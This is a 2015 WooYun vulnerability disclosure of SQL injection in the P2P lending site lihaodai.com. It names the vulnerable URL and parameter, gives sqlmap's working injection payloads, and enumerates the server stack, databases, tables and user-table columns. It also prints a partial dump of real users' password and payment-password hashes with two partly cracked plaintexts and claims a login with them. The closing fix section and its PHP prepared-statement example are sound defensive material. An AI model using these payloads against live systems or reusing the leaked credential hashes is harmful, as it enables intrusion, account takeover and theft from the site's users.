WooYun vulnerability report

Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0153481

Title: SQL injection in the P2P lending platform 利好贷 (Lihaodai) exposes user data and allows login

Vendor: 利好贷 (Lihaodai)

Author: Nelion

Submitted: 2015-11-11 11:24

Fix deadline: 2015-12-26 11:24

Published: 2015-12-26 11:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-11-11: Vendor being contacted and awaiting acknowledgement; details withheld from the public
2015-12-26: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The P2P lending platform Lihaodai (http://www.lihaodai.com/) has a SQL injection vulnerability through which user login credentials can be retrieved.

Detailed description:

Lihaodai is an online P2P investment and lending platform based in Xiamen, Fujian. It was built by experienced investors together with several closely cooperating guarantee companies, combining years of investment experience with big data and scientific risk-control techniques. (Baidu Baike)
1. Injection point: http://www.lihaodai.com/dyweb/dythemes/diyou/css/xsd/xsshow.php?xsRealName=admin (the xsRealName parameter is injectable). sqlmap confirmed three injection techniques on it:

Parameter: xsRealName (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: xsRealName=-8059' OR 1355=1355#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: xsRealName=-1233' OR 1 GROUP BY CONCAT(0x716b716a71,(SELECT (CASE WHEN (1749=1749) THEN 1 ELSE 0 END)),0x7170627a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: xsRealName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))UtYI)#
---
[01:19:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.36, Apache 2.2.22
back-end DBMS: MySQL 5.0.12

Proof of vulnerability:

2. All databases:

available databases [6]:
[*] information_schema
[*] lihaodai
[*] mysql
[*] performance_schema
[*] testtwolihaodai
[*] xuesheng


3. The 188 tables in database lihaodai:

Database: lihaodai
[188 tables]
+---------------------------------+
| deayou_account |
| deayou_approve_realname |
| deayou_users |
| deayou_users_info |
| diyou_account |
| diyou_account_balance |
| diyou_account_bank |
| diyou_account_cash |
| diyou_account_fee |
| diyou_account_fee_type |
| diyou_account_log |
| diyou_account_payment |
| diyou_account_recharge |
| diyou_account_users |
| diyou_account_users_bank |
| diyou_account_web |
| diyou_admin |
| diyou_admin_log |
| diyou_admin_login |
| diyou_admin_type |
| diyou_app_info |
| diyou_approve |
| diyou_approve_edu |
| diyou_approve_edu_id5 |
| diyou_approve_id5 |
| diyou_approve_realname |
| diyou_approve_sms |
| diyou_approve_smslog |
| diyou_approve_video |
| diyou_areas |
| diyou_articles |
| diyou_articles_pages |
| diyou_articles_type |
| diyou_attestations |
| diyou_attestations_type |
| diyou_attestations_user |
| diyou_borrow |
| diyou_borrow_activity |
| diyou_borrow_amount |
| diyou_borrow_amount_apply |
| diyou_borrow_amount_log |
| diyou_borrow_amount_type |
| diyou_borrow_apply |
| diyou_borrow_auto |
| diyou_borrow_autolog |
| diyou_borrow_care |
| diyou_borrow_change |
| diyou_borrow_change_rate |
| diyou_borrow_count |
| diyou_borrow_count_log |
| diyou_borrow_credit |
| diyou_borrow_fee |
| diyou_borrow_fee_loan |
| diyou_borrow_fee_log |
| diyou_borrow_fee_type |
| diyou_borrow_flag |
| diyou_borrow_frost |
| diyou_borrow_newtype |
| diyou_borrow_preview |
| diyou_borrow_recover |
| diyou_borrow_repay |
| diyou_borrow_roam |
| diyou_borrow_style |
| diyou_borrow_tender |
| diyou_borrow_tender_auto |
| diyou_borrow_tender_autolog |
| diyou_borrow_tender_web |
| diyou_borrow_type |
| diyou_borrow_verify |
| diyou_borrow_vouch |
| diyou_borrow_vouch_recover |
| diyou_borrow_vouch_repay |
| diyou_borrow_youxuan |
| diyou_borrow_youxuan_tender |
| diyou_comment |
| diyou_comments |
| diyou_credit |
| diyou_credit_class |
| diyou_credit_log |
| diyou_credit_rank |
| diyou_credit_type |
| diyou_daily_bao |
| diyou_daily_log |
| diyou_dw_activity_review |
| diyou_email |
| diyou_email_log |
| diyou_email_port |
| diyou_email_sendlog |
| diyou_exchange_log |
| diyou_experience_cash |
| diyou_experience_log |
| diyou_goods |
| diyou_goods_type |
| diyou_group |
| diyou_group_articles |
| diyou_group_comments |
| diyou_group_log |
| diyou_group_member |
| diyou_group_type |
| diyou_linkages |
| diyou_linkages_class |
| diyou_linkages_type |
| diyou_links |
| diyou_links_type |
| diyou_message |
| diyou_message_receive |
| diyou_modules |
| diyou_newspreads_cash_log |
| diyou_newspreads_commission_log |
| diyou_newspreads_commission_set |
| diyou_newspreads_log |
| diyou_newspreads_set |
| diyou_newspreads_subsidy_log |
| diyou_newspreads_users |
| diyou_phone |
| diyou_phone_log |
| diyou_phone_port |
| diyou_phone_smslog |
| diyou_rating_assets |
| diyou_rating_company |
| diyou_rating_contact |
| diyou_rating_educations |
| diyou_rating_finance |
| diyou_rating_houses |
| diyou_rating_info |
| diyou_rating_job |
| diyou_red_envelope_config |
| diyou_red_envelope_log |
| diyou_remind |
| diyou_remind_log |
| diyou_remind_type |
| diyou_remind_user |
| diyou_risk_account_log |
| diyou_scrollpic |
| diyou_scrollpic_type |
| diyou_site |
| diyou_site_menu |
| diyou_sms_type |
| diyou_spread_add |
| diyou_spread_log |
| diyou_spreads_log |
| diyou_spreads_set |
| diyou_spreads_settle_log |
| diyou_spreads_users |
| diyou_sysauto_auto |
| diyou_sysauto_log |
| diyou_system |
| diyou_ucenter |
| diyou_ucenter_set |
| diyou_update_system |
| diyou_users |
| diyou_users_admin |
| diyou_users_admin_login |
| diyou_users_admin_type |
| diyou_users_adminlog |
| diyou_users_care |
| diyou_users_care_user |
| diyou_users_email |
| diyou_users_email_log |
| diyou_users_examines |
| diyou_users_friends |
| diyou_users_friends_invite |
| diyou_users_friends_type |
| diyou_users_info |
| diyou_users_log |
| diyou_users_login |
| diyou_users_qq |
| diyou_users_rebut |
| diyou_users_reglog |
| diyou_users_return_log |
| diyou_users_set |
| diyou_users_sina |
| diyou_users_type |
| diyou_users_upfiles |
| diyou_users_vip |
| diyou_users_vip_bak |
| diyou_users_viplog |
| diyou_users_viplog_bak |
| diyou_users_visit |
| diyou_wechat_attention |
| diyou_wechat_focususers |
| diyou_wechat_material |
| diyou_wechat_menu |
| diyou_wechat_recovery |
| diyou_wechat_sendmsg |
| diyou_wechat_sendmsg_log |
| diyou_wechat_set |
| diyou_wechat_users |
+---------------------------------+


4. Columns of table deayou_users:

Database: lihaodai
Table: deayou_users
[14 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| block_status | int(1) |
| email | char(32) |
| last_ip | char(15) |
| last_time | int(10) |
| logintime | int(11) |
| password | char(32) |
| paypassword | varchar(100) |
| reg_ip | char(15) |
| reg_time | int(10) |
| tuijian_userid | int(11) |
| up_ip | char(15) |
| up_time | int(10) |
| user_id | int(11) unsigned |
| username | char(15) |
+----------------+------------------+


5. Data from the email, password and paypassword columns (partial dump; the email column is shown as redacted on the page, and the bracketed values beside two password hashes are the author's partially masked recovered plaintexts):

+-------------------------+---------------------------------------------+----------------------------------+
| email                   | password                                    | paypassword                      |
+-------------------------+---------------------------------------------+----------------------------------+
| [email protected]       | 3b8403d686bbf542901925af2cabb01a            | NULL                             |
| 1000**[email protected] | d0dcbf0d12a6b1e7fbfa2ce5848f3eff (**123456) | 62649863c025d9577a1fa083ccfd371d |
| [email protected]       | ca0d88224e8e4ad38bbe0d361aa33f61            | c0d843406e43169a23124018992a77f7 |
| [email protected]       | 3030737f23dea935c4a7e399e56cf30d            | NULL                             |
| [email protected]       | 8bbda585acf997a32acb39564463ec43            | 5c47452c631dc649f799dfc259fd6f85 |
| [email protected]       | 7f247a14c68f54fd0314a5c3fdb02774            | NULL                             |
| [email protected]       | a125e96d56f565f75ba27804886eecb8            | NULL                             |
| [email protected]       | 8b164f1c39a90644b8e09f5760370574            | NULL                             |
| [email protected]       | b2661916664effefd6d81b4ace9f2167            | NULL                             |
| [email protected]       | 2a83ee66c34d5e683324fd81acec8301            | 315571c9e6d18d1224276f49501a13fd |
| [email protected]       | 0f7668f4f2760a810fd6590df15ceeb6            | NULL                             |
| [email protected]       | 0c9312e5144f08599bd13cc895dcde54            | NULL                             |
| [email protected]       | db109d7f3e07b2b9e6009e3ed4b352d8            | NULL                             |
| [email protected]       | 2ae19517e1a61dc7313a028252228746            | NULL                             |
| [email protected]       | 77f451ef7a1180b89390d72a3e605871            | 64006d7012790588829719f7c1894213 |
| [email protected]       | 1e566843372eabac85a2d353c13b4e18            | NULL                             |
| [email protected]       | 7146ae0cc5e79ffad343632a432ebf08            | f01ea624e75b18b141a340f9f46d8542 |
| [email protected]       | 5a804ca36c543a14766ae1d3287ae675            | 0b85874fa48ec5fee3beeec26e358aa9 |
| [email protected]       | 6380212fca05f9676afd6f23ee0f4c80            | f6aec20d1dce52ad15c56a30326087af |
| [email protected]       | eb696f1b64c6a7ae0767d0a3176ecb53            | NULL                             |
| 101**[email protected]  | 0eafe0ae2aa251fd0c5990274faa606b (1**506)   | NULL                             |
+-------------------------+---------------------------------------------+----------------------------------+


6. Logging in with the dumped credentials:

(screenshot: 01.png)

Recommended fix:

Validate and filter the xsRealName parameter, and pass it to the database through a prepared statement so that user input never becomes part of the SQL text. Since the bracketed values in step 5 show that the stored 32-character password hashes can be recovered as plaintext, stored passwords should also be rehashed with a salted, slow password-hashing algorithm.
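As an added illustration (this is not code from the original report or from lihaodai.com, whose source is not public), the PHP below shows the query pattern that produces exactly the sqlmap behaviour seen in step 1, next to the prepared-statement version that the fix calls for. The table name xuesheng and the columns xs_id and xs_real_name are assumptions chosen to mirror the xsshow.php/xsRealName naming; the demonstration runs against an in-memory SQLite database standing in for MySQL, so sqlmap's MySQL `#` comment is replaced with the `--` comment that SQLite accepts.

```php
<?php
// Added example, not lihaodai.com's code. vulnerable_lookup() reproduces
// the pattern behind the sqlmap findings (the GET parameter is pasted into
// the SQL text); hardened_lookup() shows the fix. The table and column
// names xuesheng, xs_id and xs_real_name are assumptions.
declare(strict_types=1);

function vulnerable_lookup(PDO $db, string $xsRealName): array
{
    // Pasting the raw parameter into the statement lets a value such as
    //   -8059' OR 1355=1355#
    // close the string literal, add an always-true condition and comment
    // out the rest of the statement ('#' is a MySQL comment; SQLite uses '--').
    $sql = "SELECT xs_id, xs_real_name FROM xuesheng "
         . "WHERE xs_real_name = '" . $xsRealName . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function hardened_lookup(PDO $db, string $xsRealName): array
{
    // 1. Allow-list the input: a real name is letters only, 1 to 30 code points.
    if (!preg_match('/^\p{L}{1,30}$/u', $xsRealName)) {
        return [];
    }
    // 2. Bind the value. The SQL text and the value travel separately, so a
    //    quote, an OR or a comment marker are just bytes inside the string.
    $stmt = $db->prepare(
        'SELECT xs_id, xs_real_name FROM xuesheng WHERE xs_real_name = :name'
    );
    $stmt->execute([':name' => $xsRealName]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone demonstration on an in-memory SQLite database (requires the
// pdo_sqlite extension). Against MySQL, also set
// PDO::ATTR_EMULATE_PREPARES => false so the binding is done server-side.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE xuesheng (xs_id INTEGER PRIMARY KEY, xs_real_name TEXT)');
// Constructed sample rows.
$db->exec("INSERT INTO xuesheng (xs_real_name) VALUES ('admin'), ('张三'), ('李四')");

// sqlmap's boolean-based payload from step 1, with '--' in place of '#'.
$payload = "-8059' OR 1355=1355 -- ";

printf("vulnerable, payload : %d rows\n", count(vulnerable_lookup($db, $payload)));
printf("hardened,   payload : %d rows\n", count(hardened_lookup($db, $payload)));
printf("hardened,   'admin' : %d rows\n", count(hardened_lookup($db, 'admin')));
```

Run it with `php example.php`. The concatenating function returns every row for the payload because the WHERE clause collapses to `... OR 1355=1355`; the hardened function rejects the payload at the allow-list before any query is built, and the bound query still finds `admin` as intended. The allow-list alone is not the fix: the prepared statement is what keeps the value out of the SQL text, and the allow-list is defence in depth for the cases where the parameter is later reused somewhere else.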

Copyright notice: please credit Nelion@WooYun when reposting.


Vulnerability Response

Vendor response:

Vendor could not be reached, or vendor actively declined to respond.

Vulnerability Rank: 15 (WooYun rating)